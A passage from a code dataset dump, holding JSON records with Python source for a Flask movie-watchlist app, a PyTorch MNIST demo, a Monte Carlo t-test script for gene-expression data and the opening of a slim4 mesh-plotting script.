"line_number": 55, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 70, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 76, "usage_type": "call"}, {"api_name": "re.search", "line_number": 77, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 88, "usage_type": "call"}, {"api_name": "binascii.crc32", "line_number": 90, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 96, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 99, "usage_type": "call"}, {"api_name": "utils.get_ua", "line_number": 106, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 
107, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 129, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 136, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 137, "usage_type": "call"}, {"api_name": "utils.sleep_random", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path", "line_number": 187, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 187, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 194, "usage_type": "call"}]}
+{"seq_id": "7247076404", "text": "import os\nimport sys\nimport click\n\nfrom flask import render_template, request, url_for, flash, redirect\nfrom flask_login import login_user, login_required, logout_user, current_user\n\nfrom watchlist import app, db\nfrom watchlist.models import User, Movies\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n # Get the form data\n if request.method == 'POST':\n if not current_user.is_authenticated: # if the current user is not authenticated\n return redirect(url_for('index'))\n\n title = request.form.get('title') # pass in the name value of the matching form input field\n year = request.form.get('year')\n # Validate the data\n if not title or not year or len(year) != 4 or len(title) > 60:\n flash('Invalid Input!') # show an error message\n return redirect(url_for('index')) # redirect back to the home page\n\n movie = Movies.query.all()\n for m in movie: # check whether it already exists\n if m.title == title:\n flash('Already Exists!') # show an error message\n return redirect(url_for('index')) # redirect back to the home page\n\n # Save the form data to the database\n movie = Movies(title=title, year=year)\n db.session.add(movie) # add to the database session\n db.session.commit() # commit to the database\n flash('Item Created!')\n return redirect(url_for('index'))\n\n # movies = Movies.query.all() # read from the database\n page = int(request.args.get('page', 1)) # current page number\n per_age = int(request.args.get('per_page', 10)) # number of items per page\n paginate = Movies.query.paginate(page, per_age, error_out=False) # error_out: whether to print error messages\n movies = paginate.items # return all records on the current page\n\n return render_template('index.html', movies=movies, paginate=paginate)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n username = request.form['username']\n password = request.form['password']\n\n if not username or not password:\n flash('Invalid Input.')\n return redirect(url_for('login'))\n\n user = User.query.first()\n # Verify that the username and password match\n if username == user.username and user.validate_password(password):\n login_user(user) # log the user in\n flash('Login success.')\n return redirect(url_for('index'))\n\n flash('Invalid name or password.') # return an error message when validation fails\n return redirect(url_for('login'))\n\n return render_template('login.html')\n\n\n@app.route('/logout')\n@login_required # used for view protection\ndef logout():\n logout_user()\n flash('Goodbye.')\n return redirect(url_for('index'))\n\n\n@app.route('/movie/edit/<int:movie_id>', methods=['GET', 'POST'])\n@login_required\ndef edit(movie_id):\n movie = Movies.query.get_or_404(movie_id)\n\n if request.method == 'POST':\n title = request.form.get('title')\n year = request.form.get('year')\n\n if not title or not year or len(year) != 4 or len(title) > 60:\n flash('Invalid Input!')\n return redirect(url_for('edit', movie_id=movie_id))\n\n movie.title = title # update the title\n movie.year = year # update the year\n db.session.commit()\n flash('Item Created!')\n return redirect(url_for('index'))\n\n return render_template('edit.html', movie=movie) # pass in the movie record being edited\n\n\n@app.route('/movie/delete/<int:movie_id>', methods=['GET', 'POST'])\n@login_required\ndef delete(movie_id):\n movie = Movies.query.get_or_404(movie_id) # get the movie record\n db.session.delete(movie) # delete the matching record\n db.session.commit()\n flash(\"Item Deleted!\")\n return redirect(url_for('index'))\n\n\n@app.route('/settings', methods=['GET', 'POST'])\n@login_required\ndef settings():\n if request.method == 'POST':\n name = request.form['name']\n\n if not name or len(name) > 60:\n flash('Invalid name')\n return redirect(url_for('settings'))\n\n current_user.name = name\n # current_user returns the database object of the logged-in user, equivalent to the usage below\n # user = User.query.first()\n # user.name = name\n db.session.commit()\n flash('Settings success.')\n return redirect(url_for('index'))\n\n return render_template('settings.html')\n", "repo_name": "jiafeng666/watchlist2.0", "sub_path": "watchlist/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.request.method", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 24, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query.all", "line_number": 26, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 26, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 30, "usage_type": "call"}, {"api_name": "watchlist.models.Movies", "line_number": 33, "usage_type": "call"}, {"api_name": "watchlist.db.session.add", "line_number": 34, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 34, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 34, "usage_type": "name"}, {"api_name": 
"watchlist.db.session.commit", "line_number": 35, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 35, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "watchlist.models.Movies.query.paginate", "line_number": 42, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 42, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 12, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 56, "usage_type": "call"}, {"api_name": "watchlist.models.User.query.first", "line_number": 58, "usage_type": "call"}, {"api_name": "watchlist.models.User.query", "line_number": 58, "usage_type": "attribute"}, {"api_name": "watchlist.models.User", "line_number": 58, "usage_type": "name"}, {"api_name": "flask_login.login_user", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 68, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 48, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 48, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 76, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 71, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 71, "usage_type": "name"}, 
{"api_name": "flask_login.login_required", "line_number": 72, "usage_type": "name"}, {"api_name": "watchlist.models.Movies.query.get_or_404", "line_number": 82, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 84, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 85, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 89, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 90, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 90, "usage_type": "call"}, {"api_name": "watchlist.db.session.commit", "line_number": 94, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 94, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 98, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 79, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 79, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 80, "usage_type": "name"}, {"api_name": "watchlist.models.Movies.query.get_or_404", "line_number": 104, "usage_type": "call"}, {"api_name": "watchlist.models.Movies.query", "line_number": 104, "usage_type": "attribute"}, {"api_name": "watchlist.models.Movies", "line_number": 104, "usage_type": "name"}, {"api_name": "watchlist.db.session.delete", "line_number": 105, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 105, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 105, "usage_type": "name"}, {"api_name": "watchlist.db.session.commit", "line_number": 106, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 106, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 108, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 101, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 101, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 102, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 118, 
"usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 119, "usage_type": "call"}, {"api_name": "flask_login.current_user.name", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 121, "usage_type": "name"}, {"api_name": "watchlist.db.session.commit", "line_number": 125, "usage_type": "call"}, {"api_name": "watchlist.db.session", "line_number": 125, "usage_type": "attribute"}, {"api_name": "watchlist.db", "line_number": 125, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 129, "usage_type": "call"}, {"api_name": "watchlist.app.route", "line_number": 111, "usage_type": "call"}, {"api_name": "watchlist.app", "line_number": 111, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 112, "usage_type": "name"}]} +{"seq_id": "12861055292", "text": "import torch\nimport torchvision\nfrom torchvision import transforms, datasets\nimport matplotlib.pyplot as plt\nfrom collections import Counter, OrderedDict\n\ntrain = datasets.MNIST(\"\", train=True, download=True, transform=transforms.Compose([transforms.ToTensor()]))\ntest = datasets.MNIST(\"\", train=False, download=True, transform=transforms.Compose([transforms.ToTensor()]))\n\ntrainset = torch.utils.data.DataLoader(train, batch_size=10, shuffle=True)\ntestset = torch.utils.data.DataLoader(train, batch_size=10, shuffle=True)\n\nfor data in trainset:\n print(data)\n break\n\nx, y = data[0][0], data[1][0]\n\nprint(y)\nprint(x.shape)\n\nplt.imshow(x.view(28, 28))\nplt.show()\n\ncounter_list = []\nfor data in trainset:\n _, Y = data\n for y in Y:\n counter_list.append(int(y))\n\ncounter_dict = Counter(counter_list)\ntotal = sum(counter_dict.values())\nprint(OrderedDict(sorted(counter_dict.items())))\n\nfor i in counter_dict:\n print(f\"{i}: {counter_dict[i]/total*100}\")\n", "repo_name": "Roderich25/mac", "sub_path": "pytorch-demo/demo1.py", "file_name": "demo1.py", "file_ext": "py", "file_size_in_byte": 969, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torchvision.datasets.MNIST", "line_number": 7, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 7, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 7, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 7, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 7, "usage_type": "call"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 8, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 8, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 11, 
"usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 31, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "20421843672", "text": "#The goal of this file is to multithread the distributions before being fed into the t-test function\r\n#imports\r\n#imports\r\nimport math\r\nimport statistics\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport numpy as np\r\nfrom scipy import stats\r\nimport pandas as pd\r\nfrom numba import jit\r\nimport time\r\nimport concurrent.futures\r\n\r\n#checker function for graphing\r\n@jit()\r\ndef GraphDist(stdev, mean):\r\n # 100 linearly spaced numbers\r\n x = np.linspace(-5, 5, 100)\r\n\r\n # build equation\r\n y = (1 / (stdev * (math.sqrt(2 * math.pi)))) * math.pi ** (-.5 * ((x - mean) / stdev) ** 2)\r\n\r\n # setting the axes at the centre\r\n fig = plt.figure()\r\n\r\n # plot the function\r\n plt.plot(x, y, 'r')\r\n\r\n # show the plot\r\n plt.show()\r\n\r\n\r\n@jit()\r\ndef MonteCarlo(stdev, mean, points, rangeVal, bin1):\r\n # generate x vals:\r\n xVals = []\r\n for x in range(points):\r\n a = random.randint(round(rangeVal[0], 0), round(rangeVal[1] - 1, 0)) + random.random()\r\n if abs(round(rangeVal[0], 0)) - abs(rangeVal[0]) != 0:\r\n divider = abs(abs(round(rangeVal[0], 0)) - abs(rangeVal[0]))\r\n add = random.random() * divider\r\n a = a + add\r\n xVals.append(a)\r\n #xVals = np.append(xVals, a)\r\n\r\n # define bins\r\n valsRange = abs(rangeVal[0]) + abs(rangeVal[1])\r\n bins = np.arange(rangeVal[0], rangeVal[1] + valsRange / bin1, valsRange / bin1)\r\n\r\n # fit each x val into bin counter\r\n tally = [0] * (len(bins) - 1)\r\n for x in xVals:\r\n index = 0\r\n for y in range(len(bins) - 1):\r\n if x <= bins[y + 1] and x >= bins[y]:\r\n tally[index] += 1\r\n index += 1\r\n\r\n # get y val for each bin\r\n yVals = []\r\n for x in bins:\r\n y = (1.0 / (stdev * (math.sqrt(2.0 * math.pi)))) * math.pi ** (-.5 * ((x - mean) / stdev) ** 2.0)\r\n yVals.append(y)\r\n\r\n # weighted sum of each bin\r\n weightedSum = []\r\n for x in range(len(tally)):\r\n weightedSum.append(tally[x] * yVals[x])\r\n\r\n return bins, weightedSum\r\n\r\n\r\n@jit()\r\ndef NormalizeDistro(yVals):\r\n totalVal = sum(yVals)\r\n factor = 100 / totalVal\r\n normalizedVals = []\r\n\r\n for y in yVals:\r\n app = y * factor\r\n normalizedVals.append(round(app, 0))\r\n\r\n return normalizedVals\r\n\r\n# convert sampling normal dist into a list of normal distribution - recommended to use un-normalized distribution\r\n@jit()\r\ndef MakeDist(xVals, yVals):\r\n # test space - building t-test distribution\r\n # take the popularity and create list where each xVal is added that many times, relatively creating the normal dist\r\n\r\n intDist = []\r\n #create list of lists\r\n for x in range(len(yVals)):\r\n app = [xVals[x]]*int(round(yVals[x], 0))\r\n intDist.append(app)\r\n\r\n #flatten the list (make it one dimensional)\r\n submitDist = []\r\n for x in intDist:\r\n for y in x:\r\n submitDist.append(y)\r\n\r\n #round the numbers to 2 decimal points for faster computation\r\n for x in range(len(submitDist)):\r\n submitDist[x] = round(submitDist[x], 2)\r\n\r\n return 
submitDist\r\n\r\n#perform calculation\r\n#@jit()\r\ndef tTest(dist1, dist2):\r\n t_value,p_value = stats.ttest_ind(dist1,dist2)\r\n return t_value, p_value\r\n\r\n\r\n# putting it all together\r\n#@jit()\r\ndef RandomTtest(stdev, mean, points, rangeVal, bins, stdev2, mean2, points2, rangeVal2, bins2):\r\n # generate distributions along curve\r\n # generate distribution 1\r\n xVals, yVals = MonteCarlo(stdev, mean, points, rangeVal, bins)\r\n\r\n # generate distribution 2\r\n xVals2, yVals2 = MonteCarlo(stdev2, mean2, points2, rangeVal2, bins2)\r\n\r\n # multi-threading to flatten dist\r\n # convert into usable histogramic distributions\r\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=2)\r\n future = executor.submit(MakeDist, xVals, yVals)\r\n future1 = executor.submit(MakeDist, xVals2, yVals2)\r\n dist1 = future.result()\r\n dist2 = future1.result()\r\n\r\n # perform the student's t test\r\n t_value, p_value = tTest(dist1, dist2)\r\n\r\n return t_value, p_value\r\n\r\nif __name__==\"__main__\":\r\n #t0 = time.time()\r\n #for x in range(100):\r\n #t, p = RandomTtest(1, 0, 100_000, [-5, 5], 100, 1, 0, 100_000, [-5, 5], 100)\r\n #t1 = time.time()\r\n #print(p, t1-t0)\r\n\r\n # load in the expression values\r\n dfQual = pd.read_csv(r\"C:\\Users\\noahb\\OneDrive\\Documents\\Tensorflow_Tutorial\\mini_project\\NSCLC_Data\",\r\n index_col=\"Unnamed: 0\")\r\n print(dfQual.head())\r\n\r\n # separate the healthy and unhealthy samples into independent dataframes pt 1 - get list of\r\n # patient ids\r\n\r\n # import the file\r\n df = pd.read_csv(r\"C:\\Users\\noahb\\OneDrive\\Documents\\Tensorflow_Tutorial\\mini_project\\descriptors.txt\")\r\n\r\n # create new df\r\n descriptors_df = pd.DataFrame(data=None, columns=['class', 'name']) # create df with two columns\r\n for x in range(0, 310): # iterate through 155 critical rows (for some reason it does each twice)\r\n row = [] # set appending row to zero\r\n temp = [str(df.iloc[x]), str(df.iloc[x + 1])] # get a holder for the two values\r\n\r\n if \"low\" in temp[0]: # get class for first entry\r\n row.append(\"low\")\r\n elif \"high\" in temp[0]:\r\n row.append(\"high\")\r\n else:\r\n continue\r\n\r\n if \"GSM\" in temp[1]: # get GSM number from each entry, it's at a strange spot\r\n row.append(temp[1][temp[1].find('GSM'):temp[1].find('GSM') + 10])\r\n\r\n row_dict = {'class': row[0], 'name': row[1]} # create appending dictionary\r\n descriptors_df = descriptors_df.append(row_dict, ignore_index=True) # append dictionary to df\r\n\r\n # slight modification to index\r\n descriptors_df = descriptors_df.set_index('name') # set name of patient as index to their status\r\n print(descriptors_df.head())\r\n\r\n # separate the healthy and unhealthy samples into independent dataframes pt 2\r\n # create list of low risk samples\r\n lowRisk = []\r\n for x in range(len(descriptors_df.iloc[:, 0])):\r\n if descriptors_df.iloc[x, 0] == 'low':\r\n lowRisk.append(descriptors_df.index[x])\r\n\r\n # create list of high risk samples\r\n highRisk = []\r\n for x in range(len(descriptors_df.iloc[:, 0])):\r\n if descriptors_df.iloc[x, 0] == 'high':\r\n highRisk.append(descriptors_df.index[x])\r\n\r\n # create low risk data frame\r\n dfLow = dfQual.loc[:, lowRisk] # 1000 ids\r\n\r\n # create high risk data frame\r\n dfHigh = dfQual.loc[:, highRisk] # 1000 ids\r\n\r\n # reduce the number of rows (0-10_000)\r\n dfHigh = dfHigh.iloc[0:10_000, :]\r\n dfLow = dfLow.iloc[0:10_000, :]\r\n\r\n # qualities element - [id, mean, standard deviation]\r\n # track qualities of dfLow\r\n 
qualitiesLow = []\r\n for x in range(len(dfLow.index)):\r\n z = dfLow.iloc[x, :]\r\n identity = dfLow.index[x]\r\n stdev = statistics.stdev(z)\r\n mean = statistics.mean(z)\r\n qualitiesLow.append([identity, mean, stdev]) # match the stated [id, mean, standard deviation] order used by the calls below\r\n print(qualitiesLow[0:5])\r\n\r\n # qualities element - [id, mean, standard deviation]\r\n # track qualities of dfHigh\r\n qualitiesHigh = []\r\n for x in range(len(dfHigh.index)):\r\n z = dfHigh.iloc[x, :]\r\n identity = dfHigh.index[x]\r\n stdev = statistics.stdev(z)\r\n mean = statistics.mean(z)\r\n qualitiesHigh.append([identity, mean, stdev]) # same [id, mean, standard deviation] order\r\n print(qualitiesHigh[0:5])\r\n\r\n # call function in order: stdev1, mean1, num_points1, range_of_values1, number_of_bins1,\r\n # stdev2, mean2, num_points2, range_of_values2, number_of_bins2\r\n t0 = time.time()\r\n p_val = []\r\n for x in range(len(qualitiesLow)): # range(len(qualitiesLow)):\r\n t, p = RandomTtest(qualitiesLow[x][2], qualitiesLow[x][1], 100_000,\r\n [-37 + qualitiesLow[x][1], 37 + qualitiesLow[x][1]], 100, qualitiesHigh[x][2],\r\n qualitiesHigh[x][1], 100_000, [-37 + qualitiesHigh[x][1], 37 + qualitiesHigh[x][1]],\r\n 100)\r\n p_val.append(p)\r\n t1 = time.time()\r\n print(len(p_val), t1-t0)\r\n\r\n#final solution was to use numba instead of cython\r\n#using the time module, the numba time was roughly 1.83 seconds compared to the normal 48.85 under these parameters t, p = RandomTtest(1, 0, 1_000_000, [-5, 5], 100, 1, 0, 1_000_000, [-5, 5], 100)\r\n#that's an increase of over 26x!!\r\n#multithreading the flattening algorithm had an impact of reducing the time with the same parameters to roughly 1.7 seconds\r\n#unfortunately, multitasking the distribution making had no impact or even made the time worse for some trials, this is unexpected but interesting\r\n#by reducing the sim to 100,000 points each dist, the time is reduced to roughly 1.5s, I think this is the best selection of hyperparameter\r\n#also experimented with removing @jit on certain functions, got down to ~1.15s", "repo_name": "thatguynoah/Bio-IA", "sub_path": "optimizedTTestProc.py", "file_name": "optimizedTTestProc.py", "file_ext": "py", "file_size_in_byte": 8866, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 22, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "numba.jit", "line_number": 16, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 49, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 63, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numba.jit", "line_number": 34, "usage_type": "call"}, {"api_name": "numba.jit", 
"line_number": 74, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 87, "usage_type": "call"}, {"api_name": "scipy.stats.ttest_ind", "line_number": 113, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 113, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 129, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 129, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 129, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 148, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 159, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 210, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 211, "usage_type": "call"}, {"api_name": "statistics.stdev", "line_number": 221, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 222, "usage_type": "call"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "time.time", "line_number": 236, "usage_type": "call"}]} +{"seq_id": "17872530754", "text": "#%%\nfrom ctypes import c_int\nimport slim4\nfrom slim4 import slim2d\nimport os\nimport numpy as np\nimport time\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport cmocean\n\nfrom slim4.slimcl import cu as launcher\nfrom stommel_ref import UVEtaAnalytic as analytic\nfrom line_profiler import LineProfiler\n\n#%%\ntic = time.time()\nscalar = np.float32\ncc = \"gcc\"\n############# Mesh initialization #############\ncomm_rank = slim4.mpi_rank()\ncomm_size = slim4.mpi_size()\nnode_rank = launcher.get_node_rank()\nnode_size = launcher.get_node_size()\nif comm_size > 1 :\n partname = slim2d.partition_mesh(\"square.msh\")\n mesh = slim2d.Mesh(partname, None)\nelse :\n fpath = os.path.dirname(os.path.realpath(__file__))\n mesh = slim2d.Mesh(fpath + \"/square.msh\",None)\n\ncmap = matplotlib.cm.get_cmap('brg')\nnt = len(mesh.x)\ncolor = cmap(np.linspace(0, 1, nt))\n\nplt.figure(figsize=(6,6))\nneighbours = mesh.neighbours\ncentroids = mesh.x.mean(axis=1)\nplt.triplot(mesh.xnodes[:, 0], mesh.xnodes[:, 1], mesh.triangles[:mesh.n_triangles], color=\"k\", lw=1, alpha=0.9)\nfor i in range(nt-1):\n plt.plot(centroids[i:i+2,0], centroids[i:i+2,1], '.-', lw=1, alpha=0.5, c=color[i])\nplt.gca().set_aspect(1)\nplt.gca().axis(\"off\")\nplt.savefig(\"Figures/order0.pdf\")\nos.system(\"pdfcrop 